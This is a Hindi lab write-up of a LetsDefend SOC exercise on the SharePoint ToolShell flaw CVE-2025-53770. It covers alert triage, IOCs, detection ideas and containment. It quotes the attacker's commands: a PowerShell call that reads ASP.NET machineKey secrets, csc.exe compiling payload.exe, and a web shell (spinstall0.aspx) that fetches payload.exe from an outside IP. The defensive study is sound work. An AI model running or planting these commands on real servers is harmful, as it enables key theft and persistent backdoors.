# LetsDefend SOC342 लैब का चरण-दर-चरण विवरण: CVE-2025-53770 SharePoint ToolShell प्रमाणीकरण बायपास और RCE का विश्लेषण, जिसमें हमले की श्रृंखला, फोरेंसिक विश्लेषण और रोकथाम कार्रवाइयाँ शामिल हैं।
मैंने LetsDefend साइबर लैब में ToolShell (CVE-2025-53770) नामक SharePoint ज़ीरो-डे की जाँच की।
यह अभ्यास एक वास्तविक दुनिया के ज़ीरो-डे RCE हमले की नकल था जिसमें एक दुर्भावनापूर्ण POST अनुरोध ने प्रमाणीकरण को बायपास किया, MachineKeySection कुंजियाँ चुराने के लिए PowerShell निष्पादित किया, payload.exe संकलित किया, और एक दुर्भावनापूर्ण वेब शेल (spinstall0.aspx) गिराया।
यह README आक्रमण प्रक्रिया, फोरेंसिक चरणों, रोकथाम कार्रवाइयों और सीखे गए सबक का दस्तावेजीकरण करता है।
| फ़ील्ड | विवरण |
|---|
| प्लेटफ़ॉर्म | LetsDefend Cyber Range |
| लक्ष्य | SharePoint Server (SharePoint01) |
| CVE | CVE-2025-53770 |
| उद्देश्य | RCE का विश्लेषण, पहचान और रोकथाम का अभ्यास |
| उपयोग किए गए उपकरण | Windows PowerShell, VirusTotal, AbuseIPDB, Talosintelligence, LetsDefend Log Management, LetsDefend Endpoint Security, Base64 Decoder, LetsDefend Threat Intel |
एक महत्वपूर्ण अलर्ट ने SharePoint में ToolPane.aspx को लक्षित करने वाली संदिग्ध गतिविधि को बड़े पेलोड और नकली Referer के साथ फ़्लैग किया।
यह CVE-2025-53770 से संबंधित है, जो एक ज़ीरो-डे भेद्यता है जो क्राफ्टेड POST अनुरोधों के माध्यम से अनप्रमाणित RCE की अनुमति देती है।

यह क्या है: इस अलर्ट को सौंपा गया गंभीरता स्तर — उच्चतम और सबसे तत्काल।
यह क्यों मायने रखता है: संकेत देता है कि यह घटना पूर्ण सिस्टम समझौता (RCE) का कारण बन सकती है। इसे शीर्ष-प्राथमिकता मानें: तुरंत अलग करें और जाँच करें।
यह क्या है: वह समय-टिकट जब अलर्ट ट्रिगर हुआ था।
यह क्यों मायने रखता है: इसका उपयोग लॉग खोजने, संबंधित घटनाओं को सहसंबंधित करने और टाइमलाइन बनाने के लिए करें (कुछ मिनट या घंटे ± खोजें)।
यह क्या है: वह पहचान नियम या सिग्नेचर जो सक्रिय हुआ, मिलान की गई स्थिति का वर्णन करता है (ToolShell शोषण प्रयास)।
यह क्यों मायने रखता है: पहचानता है कि कौन सा आक्रमण पैटर्न पाया गया — समान मामलों की खोज के लिए उपयोगी (जैसे, व्यवस्थापक पृष्ठों पर अनप्रमाणित POST या संभावित वेबशेल अपलोड)।
यह क्या है: इस विशिष्ट अलर्ट उदाहरण या नियम के लिए संख्यात्मक पहचानकर्ता (विक्रेता-परिभाषित)।
यह क्यों मायने रखता है: टिकट या रिपोर्ट में इस अलर्ट को ट्रैक करने, फ़िल्टर करने और संदर्भित करने में मदद करता है।
यह क्या है: उच्च-स्तरीय वर्गीकरण — यह अलर्ट वेब अवसंरचना को लक्षित करता है।
यह क्यों मायने रखता है: घटना को वेब/SharePoint/इंफ्रा टीम को रूट करता है और वेब-विशिष्ट प्लेबुक लागू करता है।
यह क्या है: विश्लेषक भूमिका या एस्केलेशन स्तर जिससे अलर्ट को संभालने की अपेक्षा की जाती है।
यह क्यों मायने रखता है: संकेत देता है कि यह Tier-1 अलर्ट नहीं है — तत्काल कार्रवाई के लिए एक सुरक्षा विश्लेषक (अनुभवी प्रतिक्रियाकर्ता) की आवश्यकता है।
यह क्या है: प्रभावित होस्ट का नाम (गतिविधि का लक्ष्य या स्रोत)।
यह क्यों मायने रखता है: यह प्राथमिक रोकथाम लक्ष्य है — पहले इस सिस्टम को अलग करें, साक्ष्य एकत्र करें और निगरानी करें।
यह क्या है: संदिग्ध अनुरोध भेजने वाला IP (हमलावर या प्रॉक्सी)।
यह क्यों मायने रखता है: इसे फ़ायरवॉल/WAF पर ब्लॉक करें, इससे अन्य हिट्स खोजें, और स्वामित्व/भौगोलिक जानकारी जाँचें। ध्यान दें: IP नकली या बॉटनेट का हिस्सा हो सकते हैं।
यह क्या है: आंतरिक लक्ष्य IP (SharePoint01)।
यह क्यों मायने रखता है: पुष्टि करता है कि किस आंतरिक सिस्टम को लक्षित किया गया था — होस्टनाम से मैप करें और आंतरिक पहुँच पथ/फ़ायरवॉल नियमों की समीक्षा करें।
यह क्या है: उपयोग किया गया HTTP वर्ब — क्लाइंट ने सर्वर को डेटा भेजा।
यह क्यों मायने रखता है: व्यवस्थापक एंडपॉइंट्स पर POST अनप्रमाणित या बड़े होने पर संदिग्ध होते हैं — वे एक्सप्लॉइट पेलोड या वेबशेल ले जा सकते हैं।
/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
यह क्या है: सटीक लक्षित वेब पथ और पैरामीटर।
यह क्यों मायने रखता है: यह एक SharePoint व्यवस्थापक/लेआउट एंडपॉइंट है — हमलावरों द्वारा प्रमाणीकरण बायपास या कोड अपलोड के लिए आमतौर पर दुरुपयोग किया जाता है। उसी पथ पर अन्य अनुरोधों की खोज करें।
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
यह क्या है: क्लाइंट द्वारा रिपोर्ट की गई ब्राउज़र स्ट्रिंग।
यह क्यों मायने रखता है: अक्सर हमलावरों द्वारा वैध दिखने के लिए नकली बनाई जाती है — लॉग फ़िल्टर करने में मदद कर सकती है, लेकिन पहचान के लिए इस पर भरोसा न करें।
/_layouts/SignOut.aspx
यह क्या है: HTTP हेडर जो दावा करता है कि अनुरोध SharePoint के साइन-आउट पृष्ठ से आया था।
यह क्यों मायने रखता है: नकली रेफरर संदिग्ध होते हैं — जाँचों को बायपास करने या सामान्य ट्रैफ़िक की नकल करने के लिए उपयोग किए जा सकते हैं। वैध नेविगेशन प्रवाह से तुलना करें।
7699यह क्या है: HTTP अनुरोध निकाय का आकार (बाइट्स में)।
यह क्यों मायने रखता है: किसी व्यवस्थापक एंडपॉइंट पर बड़ा POST निकाय एक क्रमबद्ध एक्सप्लॉइट या फ़ाइल अपलोड का सुझाव देता है। उसी URL पर समान आकार के अन्य POST देखें।
पाठ: बड़े पेलोड आकार और नकली रेफरर के साथ ToolPane.aspx को लक्षित करने वाला संदिग्ध अनप्रमाणित POST अनुरोध — CVE-2025-53770 शोषण का संकेत।
यह क्या है: मिलान किए गए व्यवहार का सारांश देने वाली नियम व्याख्या।
यह क्यों मायने रखता है: वर्णन करता है कि अलर्ट वास्तव में क्यों सक्रिय हुआ — सत्यापित करें कि अनुरोध अनप्रमाणित था या नहीं, कौन सा पेलोड भेजा गया था, और क्या यह ज्ञात एक्सप्लॉइट पैटर्न से मेल खाता है।
यह क्या है: सुरक्षा डिवाइस की प्रतिक्रिया (जैसे, WAF/फ़ायरवॉल) दर्शाता है।
यह क्यों मायने रखता है: चूँकि इसे अनुमति दी गई थी, आक्रमण होस्ट तक पहुँच गया — इसे संभावित समझौते के रूप में मानें।
तत्काल कार्रवाइयाँ:
107.191.58.76)SharePoint01) की जाँच करें🔎 सारांश:
यह अलर्ट ToolPane.aspx (SharePoint RCE CVE-2025-53770) का शोषण करने वाले एक अनप्रमाणित एक्सप्लॉइट प्रयास को दर्शाता है। POST अनुरोध में बड़ा पेलोड और नकली रेफरर था, जो ToolShell ज़ीरो-डे शोषण व्यवहार के अनुरूप है। चूँकि डिवाइस ने अनुरोध की अनुमति दी थी, जब तक अन्यथा सिद्ध न हो, संभावित समझौते को मानें। 🟥 गंभीरता: क्रिटिकल
IIS/WAF में ToolPane.aspx पर POST खोजें (लगभग 2025-07-22 13:07):
Select-String -Path "C:\inetpub\logs\LogFiles\**\*.log" -Pattern "/_layouts/15/ToolPane.aspx" | Out-File .\IIS_ToolPane_hits.txt
WAF/प्रॉक्सी या पैकेट कैप्चर से पूर्ण POST निकाय निकालें और फोरेंसिक शेयर में सहेजें।
वेबरूट में नई/संशोधित ASPX देखें (वेबशेल):
Get-ChildItem "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\**\*.aspx" -Recurse | Sort LastWriteTime -Desc | Select FullName,LastWriteTime
हमलावर को ब्लॉक करें और होस्ट को अलग करें: परिधि/WAF पर 107.191.58.76 ब्लॉक करें और SharePoint01 को क्वारंटीन में ले जाएँ (या ईग्रेस प्रतिबंधित करें)।
संदिग्ध फ़ाइलों को हटाएँ नहीं — पहले फोरेंसिक प्रतियाँ बनाएँ।
Microsoft SharePoint एक सहयोग और दस्तावेज़ प्रबंधन प्लेटफ़ॉर्म है।
यह Active Directory, Teams, Outlook और Power BI के साथ एकीकृत सुरक्षित फ़ाइल संग्रहण, संस्करण नियंत्रण और इंट्रानेट पोर्टल प्रदान करता है।
Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन का शोषण करने वाली एक महत्वपूर्ण अनप्रमाणित RCE भेद्यता।
हमलावर इसका उपयोग करते हैं:
🧮 CVSS स्कोर: 9.8 (क्रिटिकल)
📡 शोषण: जंगली में सक्रिय
स्रोत IP: 107.191.58.76
🧩 परिणाम: 15/95 सुरक्षा विक्रेताओं ने इसे दुर्भावनापूर्ण के रूप में फ़्लैग किया।

AbuseIPDB के माध्यम से जाँच की गई — IP इनसे जुड़ा:

Talos Intelligence के माध्यम से जाँच की गई — IP/सबनेट विशेषताएँ:
*.vultrusercontent.com
एंडपॉइंट सुरक्षा में होस्ट SharePoint01 का पता लगाया।
संदिग्ध कमांड के लिए टर्मिनल इतिहास की जाँच की।

यह लॉग दिखाता है कि 13:07:11 पर, SharePoint एप्लिकेशन पूल के अंतर्गत एक PowerShell प्रक्रिया चली, जिसने Base64-एन्कोडेड कमांड निष्पादित किया। पैरेंट प्रक्रिया services.exe थी, और आक्रमण SharePoint निर्देशिकाओं को लक्षित कर रहा था। यह SharePoint सर्वर के भीतर ToolShell शोषण और दूरस्थ कोड निष्पादन का स्पष्ट संकेतक है।
-nop = -NoProfile: PowerShell को उपयोगकर्ता प्रोफ़ाइल लोड किए बिना प्रारंभ करें (प्रोफ़ाइल-आधारित पहचान से बचाता है, तेज़ी से चलता है)।-w hidden = -WindowStyle Hidden: विंडो दिखाए बिना चलाएँ (गुप्त)।-e = -EncodedCommand: निम्न स्ट्रिंग Base64-एन्कोडेड PowerShell सामग्री है (आमतौर पर UTF-16LE या कभी-कभी UTF-8) — कोड को आकस्मिक निरीक्षण और सरल लॉग से छिपाने के लिए उपयोग किया जाता है।<BASE64>: लंबा Base64 पेलोड — डिकोड करने पर इसमें एक ASPX सर्वर स्क्रिप्ट (वेबशेल जैसी दिखती है) होती है जो MachineKey मान पढ़ती है।

⚙️ व्यवहार सारांश
यह ViewState/auth टोकन जालसाजी के लिए MachineKey चोरी का संकेत देता है — क्लासिक ToolShell शोषण।

🧩 निष्कर्ष: हमलावर ने अंतर्निहित .NET कंपाइलर का उपयोग करके payload.cs को payload.exe में संकलित किया → संभावित मैलवेयर।
यह वास्तव में क्या करता है (चरण-दर-चरण):
csc.exe चलाता है → C# कंपाइलर जो .NET Framework के साथ आता है।/out:C:\Windows\Temp\payload.exe → कंपाइलर को बताता है संकलित प्रोग्राम कहाँ सहेजना है और उसका नाम क्या रखना है (payload.exe)।C:\Windows\Temp\payload.cs → C# स्रोत फ़ाइल (मानव-पठनीय कोड) जिसे कंपाइलर एक चलाने योग्य प्रोग्राम में बदलता है।यह खतरनाक क्यों है (शुरुआती व्याख्या):
.cs) को एक निष्पादन योग्य (.exe) में बदल दिया।payload.exe) हमलावर द्वारा प्रोग्राम किए गए किसी भी कार्य को कर सकती है: नेटवर्क कनेक्शन खोलना, शेल उत्पन्न करना, स्थायित्व स्थापित करना, या डेटा चुराना।हमलावर ने संभवतः आक्रमण श्रृंखला में इसका उपयोग कैसे किया:
payload.cs बनाया या अपलोड किया।payload.exe में संकलित किया ताकि यह सर्वर पर एक नेटिव प्रोग्राम के रूप में चल सके।देखने योग्य साक्ष्य (लॉग/फ़ाइलों में क्या खोजें):
csc.exe के लिए प्रक्रिया निर्माण घटनाएँ जिनमें payload.cs या /out:C:\Windows\Temp\payload.exe की ओर इशारा करने वाले तर्क हों।C:\Windows\Temp\payload.cs और C:\Windows\Temp\payload.exe का अस्तित्व (फोरेंसिक प्रतियाँ एकत्र करें और हैश की गणना करें)।w3wp.exe / powershell.exe / cmd.exe csc.exe उत्पन्न कर रहे हैं।payload.exe से उत्पन्न नेटवर्क गतिविधि या प्रक्रिया गतिविधि यदि यह निष्पादित हुआ।एक-पंक्ति सारांश (README/टिकट के लिए):
हमलावर ने .NET C# कंपाइलर (csc.exe) का उपयोग करके होस्ट पर payload.cs को payload.exe में संकलित किया — आगे की दुर्भावनापूर्ण गतिविधि के लिए एक नेटिव निष्पादन योग्य बनाना।

🧩 निष्कर्ष: SharePoint की LAYOUTS निर्देशिका के अंदर spinstall0.aspx बनाया → वेब-सुलभ बैकडोर।
यह वास्तव में क्या करता है (चरण-दर-चरण, सरल भाषा में):
cmd.exe /c चलाता है → एकल कमांड चलाने और फिर बाहर निकलने के लिए Windows कमांड शेल प्रारंभ करता है।echo <...> > "...\spinstall0.aspx" → प्रदान किया गया HTML/ASPX टेक्स्ट प्रिंट करता है और इसे spinstall0.aspx फ़ाइल में लिखता है (> ऑपरेटर फ़ाइल बनाता या अधिलेखित करता है)।runat="server" शामिल है → फ़ाइल को सर्वर-साइड ASPX बनाता है, इसलिए IIS/SharePoint इसे स्थैतिक टेक्स्ट के रूप में परोसने के बजाय वेब एप्लिकेशन प्रक्रिया के अंदर निष्पादित करता है।<object> तत्व में Url="http://107.191.58.76/payload.exe" शामिल है → पृष्ठ (या निष्पादित होने पर सर्वर) को दूरस्थ होस्ट से हमलावर का payload.exe लाने का निर्देश देता है।यह खतरनाक क्यों है (शुरुआती व्याख्या):
हमलावर ने संभवतः आक्रमण श्रृंखला में इसका उपयोग कैसे किया:
spinstall0.aspx लिखा।payload.exe लाता है।देखने योग्य साक्ष्य (लॉग/फ़ाइलों में क्या खोजें):
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx — फोरेंसिक प्रति एकत्र करें और SHA256 की गणना करें।cmd.exe उस पथ पर लिख रहा है।spinstall0.aspx पर अनुरोध या http://107.191.58.76/payload.exe पर बाहरी अनुरोध दिखाते हुए।spinstall0.aspx तक पहुँच के तुरंत बाद प्रक्रिया निर्माण या नेटवर्क गतिविधि (पेलोड डाउनलोड/निष्पादन का संकेत)।एक-पंक्ति सारांश (README/टिकट के लिए):
हमलावर ने SharePoint के LAYOUTS फ़ोल्डर में एक सर्वर-साइड ASPX वेब शेल (spinstall0.aspx) बनाया जो सर्वर को हमलावर अवसंरचना से payload.exe लाने/चलाने का निर्देश देता है — स्थायी दूरस्थ बैकडोर।

🧩 निष्कर्ष: MachineKey कॉन्फ़िगरेशन पढ़ने और बाहर निकालने के लिए PowerShell निष्पादित किया — प्रत्यक्ष RCE पूर्व-शर्त।
यह वास्तव में क्या करता है (चरण-दर-चरण):
powershell.exe चलाता है → Windows स्क्रिप्टिंग शेल।-Command PowerShell को निम्न अभिव्यक्ति निष्पादित करने के लिए कहता है।[System.Web.Configuration.MachineKeySection]::GetApplicationConfig() .NET को ASP.NET machineKey कॉन्फ़िगरेशन ऑब्जेक्ट पुनर्प्राप्त करने के लिए कॉल करता है (जिसमें ValidationKey, DecryptionKey और संबंधित सेटिंग्स शामिल हैं)।यह खतरनाक क्यों है (शुरुआती व्याख्या):
machineKey में गुप्त कुंजियाँ होती हैं जिनका उपयोग ASP.NET करता है:
ViewState और फॉर्म्स-प्रमाणीकरण कुकीज़ पर हस्ताक्षर और सत्यापन।ValidationKey/DecryptionKey प्राप्त करता है, तो वे:
ViewState या प्रमाणीकरण कुकीज़ जाली बना सकते हैं, या टोकन डिक्रिप्ट कर सकते हैं।हमलावर ने संभवतः आक्रमण श्रृंखला में इसका उपयोग कैसे किया:
ToolPane.aspx का शोषण करें।ValidationKey / DecryptionKey कैप्चर करें।ViewState) या वैध प्रमाणीकरण कुकीज़ बनाने के लिए कुंजियों का उपयोग करें।देखने योग्य साक्ष्य (लॉग/फ़ाइलों में क्या खोजें):
GetApplicationConfig या MachineKeySection के साथ powershell.exe दिखाने वाली प्रक्रिया निर्माण घटनाएँ।ValidationKey / DecryptionKey)।MachineKeySection / GetApplicationConfig को कॉल करने वाले ASPX पेज या वेबशेल।IIS APPPOOL\SharePoint) द्वारा असामान्य गतिविधि।एक-पंक्ति सारांश (README/टिकट के लिए):
हमलावर ने System.Web.Configuration.MachineKeySection::GetApplicationConfig() को कॉल करने के लिए PowerShell निष्पादित किया — ASP.NET machineKey (ValidationKey/DecryptionKey) निकालने का प्रयास, टोकन जालसाजी और प्रमाणीकरण बायपास सक्षम करना।
स्रोत: LetsDefend थ्रेट इंटेल (आईपी 107.191.58.76 द्वारा क्वेरी की गई)
Referer: /_layouts/SignOut.aspx देखा गया।
| प्रकार | संकेतक | विवरण |
|---|---|---|
| IP | 107.191.58.76 | हमलावर का स्रोत IP जो एक्सप्लॉइट POST भेज रहा है |
| URL | /_layouts/15/ToolPane.aspx?DisplayMode=Edit | एक्सप्लॉइट एंडपॉइंट |
| फ़ाइल | spinstall0.aspx | तैनात दुर्भावनापूर्ण ASPX वेब शेल |
| स्ट्रिंग | MachineKeySection | machineKey बाहर निकालने के प्रयास का साक्ष्य |
Victorऑन‑प्रिम SharePoint (SharePoint01) के विरुद्ध ToolShell ज़ीरो‑डे शोषण (CVE‑2025‑53770) का पता चला। हमलावर (आईपी 107.191.58.76) ने प्रमाणीकरण को बायपास किया और कई पोस्ट‑एक्सप्लॉइट क्रियाएँ कीं:
spinstall0.aspx (वेब शेल) अपलोड किया।payload.exe संकलित किया।

निष्कर्ष: समझौते की पुष्टि — वेब‑शेल तैनाती, कुंजी बाहर निकालना, और होस्ट पर पेलोड संकलन।
SharePoint01 को अलग करें (क्वारंटीन VLAN) या परिधि/WAF/फ़ायरवॉल पर हमलावर IP को ब्लॉक करें।spinstall*.aspx, payload.exe (फ़ाइलनाम/हैश द्वारा), और GetApplicationConfig/MachineKeySection उपयोग खोजें।spinstall0.aspx, अनधिकृत शेड्यूल किए गए कार्यों/सेवाओं, और किसी भी पहचाने गए मैलवेयर को हटाएँ (फोरेंसिक प्रतियाँ एकत्र करने के बाद)।machineKey मानों को घुमाएँ (ऐप स्वामियों के साथ समन्वय करें) और सभी ऑन‑प्रिम SharePoint इंस्टेंस पर Microsoft जुलाई 2025 आपातकालीन पैच लागू करें।-EncodedCommand / -e) के लिए डिटेक्शन जोड़ें।C:\Windows\Temp में कोड संकलित करने वाले csc.exe उपयोग पर अलर्ट करें।POST को ब्लॉक करें।csc.exe, cmd.exe, powershell.exe) अक्सर पोस्ट‑एक्सप्लॉइट में दुरुपयोग की जाती हैं; वेब सर्वरों पर अप्रत्याशित उपयोग की निगरानी करें।SharePoint01 को क्वारंटीन करें और 107.191.58.76 को ब्लॉक करें।spinstall0.aspx, payload.cs, payload.exe की फोरेंसिक प्रतियाँ एकत्र करें (टाइमस्टैम्प संरक्षित करें)।w3wp.exe / payload.exe की मेमोरी डंप करें।machineKey और प्रभावित क्रेडेंशियल घुमाएँ।